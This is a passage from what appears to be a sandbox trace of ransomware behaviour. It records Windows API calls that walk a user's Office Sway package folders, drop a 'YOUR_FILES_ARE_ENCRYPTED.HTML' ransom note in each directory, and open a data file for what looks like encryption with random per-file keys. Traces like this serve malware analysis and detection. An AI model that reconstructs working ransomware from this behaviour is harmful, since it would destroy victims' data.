dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0116.934] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.934] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalState") returned 95 [0116.934] GetProcessHeap () returned 0x600000 [0116.934] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.934] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalState" [0116.934] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalState\\*" [0116.934] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61716890, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61716890, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.935] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61716890, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61716890, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0116.935] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61716890, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61716890, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 0 [0116.935] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.935] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0116.935] GetProcessHeap () returned 0x600000 [0116.935] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.935] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.936] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.936] CloseHandle (hObject=0x320) returned 1 [0116.937] GetProcessHeap () returned 0x600000 [0116.937] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.937] GetProcessHeap () returned 0x600000 [0116.937] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.937] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61e63d2f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61e63d2f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61e63d2f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0116.937] StrStrIW (lpFirst="Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.937] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe") returned 141 [0116.937] GetProcessHeap () returned 0x600000 [0116.937] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.938] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe" [0116.938] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\*" [0116.938] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61e63d2f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61e63d2f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61e63d2f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.939] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61e63d2f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61e63d2f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61e63d2f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0116.939] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61e63d2f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61e63d2f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6209ff34, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0116.939] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.939] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 157 [0116.939] GetProcessHeap () returned 0x600000 [0116.939] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.940] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore" [0116.940] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0116.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61e63d2f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61e63d2f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6209ff34, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62ec40, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.942] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61e63d2f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61e63d2f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6209ff34, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 1 [0116.942] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61efc6ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x622b61f5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x622b61f5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x311bec0, dwReserved1=0x62ec40, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0116.942] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.942] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 177 [0116.942] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0116.942] lstrlenW (lpString=".dat") returned 4 [0116.942] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0116.942] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0116.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\microsoft.office.sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0116.943] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=262144) returned 1 [0116.943] GetProcessHeap () returned 0x600000 [0116.943] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0116.946] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="D4") returned 2 [0116.946] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="23") returned 2 [0116.946] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="52") returned 2 [0116.946] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="31") returned 2 [0116.946] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="24") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="07") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="D0") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="31") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="11") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="C3") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="30") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="09") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="58") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="51") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="D7") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="1D") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="39") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="F9") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="FE") returned 2 [0116.946] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="57") returned 2 [0116.946] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="8B") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="72") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="77") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="F5") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="56") returned 2 [0116.946] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="1A") returned 2 [0116.947] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="39") returned 2 [0116.947] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="F9") returned 2 [0116.947] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="2D") returned 2 [0116.947] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="EB") returned 2 [0116.947] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="1E") returned 2 [0116.947] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="02") returned 2 [0116.947] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0116.947] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.947] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0116.947] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6209ff34, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6209ff34, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6209ff34, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62ec40, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0116.947] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.947] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 182 [0116.947] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0116.947] lstrlenW (lpString=".LOG1") returned 5 [0116.947] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0116.947] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6209ff34, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6209ff34, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6209ff34, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62ec40, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0116.948] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.948] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 182 [0116.948] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0116.948] lstrlenW (lpString=".LOG2") returned 5 [0116.948] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0116.948] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6209ff34, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6209ff34, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6209ff34, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62ec40, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0116.948] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.948] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 187 [0116.948] GetProcessHeap () returned 0x600000 [0116.948] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\microsoft.office.sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.949] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.950] CloseHandle (hObject=0x214) returned 1 [0116.950] GetProcessHeap () returned 0x600000 [0116.950] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.950] GetProcessHeap () returned 0x600000 [0116.950] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.950] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61e63d2f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61e63d2f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6209ff34, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0116.950] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.950] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 171 [0116.950] GetProcessHeap () returned 0x600000 [0116.950] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\microsoft.office.sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0117.062] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.063] CloseHandle (hObject=0x320) returned 1 [0117.063] GetProcessHeap () returned 0x600000 [0117.063] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.063] GetProcessHeap () returned 0x600000 [0117.063] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0117.064] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61716890, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61716890, 